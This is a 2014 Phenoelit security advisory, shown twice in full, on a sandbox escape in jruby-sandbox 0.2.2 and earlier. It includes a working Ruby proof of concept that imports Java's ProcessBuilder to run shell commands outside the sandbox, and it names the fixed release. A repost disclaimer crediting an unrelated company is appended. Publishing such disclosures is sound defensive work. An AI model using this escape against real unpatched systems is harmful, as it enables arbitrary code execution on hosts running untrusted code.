Phenoelit Advisory <wir-haben-auch-mal-was-gefunden #0815 +-+++>
[ Authors ]
joernchen <joernchen () phenoelit de>
Phenoelit Group (http://www.phenoelit.de)
[ Affected Products ]
jruby-sandbox <= 0.2.2
https://github.com/omghax/jruby-sandbox
[ Vendor communication ]
2014-04-22 Send vulnerability details to project maintainer
2014-04-24 Requesting confirmation that details were received
2014-04-24 Maintainer states he is working on a test case
2014-04-24 Maintainer releases fixed version
2014-04-24 Release of this advisory
[ Description ]
jruby-sandbox aims to allow safe execution of user given Ruby
code within a JRuby [0] runtime. However via import of Java
classes it is possible to circumvent those protections and
execute arbitrary code outside the sandboxed environment.
[ Example ]
require 'sandbox'
sand = Sandbox.safe
sand.activate!
begin
sand.eval("print `id`")
rescue Exception => e
puts "fail via Ruby ;)"
end
puts "Now for some Java"
sand.eval("Kernel.send :java_import, 'java.lang.ProcessBuilder'")
sand.eval("Kernel.send :java_import, 'java.util.Scanner'")
sand.eval("s = Java::java.util.Scanner.new( " +
"Java::java.lang.ProcessBuilder.new('sh','-c','id')" +
".start.getInputStream ).useDelimiter(\"\x00\").next")
sand.eval("print s")
[ Solution ]
Upgrade to version 0.2.3
[ References ]
[0] http://jruby.org/
[ end of file ]
joernchen ~ Phenoelit
<joernchen@phenoelit.de> ~ C776 3F67 7B95 03BF 5344
http://www.phenoelit.de ~ A46A 7199 8B7B 756A F5AC
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise.Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information
[ Authors ]
joernchen <joernchen () phenoelit de>
Phenoelit Group (http://www.phenoelit.de)
[ Affected Products ]
jruby-sandbox <= 0.2.2
https://github.com/omghax/jruby-sandbox
[ Vendor communication ]
2014-04-22 Send vulnerability details to project maintainer
2014-04-24 Requesting confirmation that details were received
2014-04-24 Maintainer states he is working on a test case
2014-04-24 Maintainer releases fixed version
2014-04-24 Release of this advisory
[ Description ]
jruby-sandbox aims to allow safe execution of user given Ruby
code within a JRuby [0] runtime. However via import of Java
classes it is possible to circumvent those protections and
execute arbitrary code outside the sandboxed environment.
[ Example ]
require 'sandbox'
sand = Sandbox.safe
sand.activate!
begin
sand.eval("print `id`")
rescue Exception => e
puts "fail via Ruby ;)"
end
puts "Now for some Java"
sand.eval("Kernel.send :java_import, 'java.lang.ProcessBuilder'")
sand.eval("Kernel.send :java_import, 'java.util.Scanner'")
sand.eval("s = Java::java.util.Scanner.new( " +
"Java::java.lang.ProcessBuilder.new('sh','-c','id')" +
".start.getInputStream ).useDelimiter(\"\x00\").next")
sand.eval("print s")
[ Solution ]
Upgrade to version 0.2.3
[ References ]
[0] http://jruby.org/
[ end of file ]
joernchen ~ Phenoelit
<joernchen@phenoelit.de> ~ C776 3F67 7B95 03BF 5344
http://www.phenoelit.de ~ A46A 7199 8B7B 756A F5AC
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise.Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information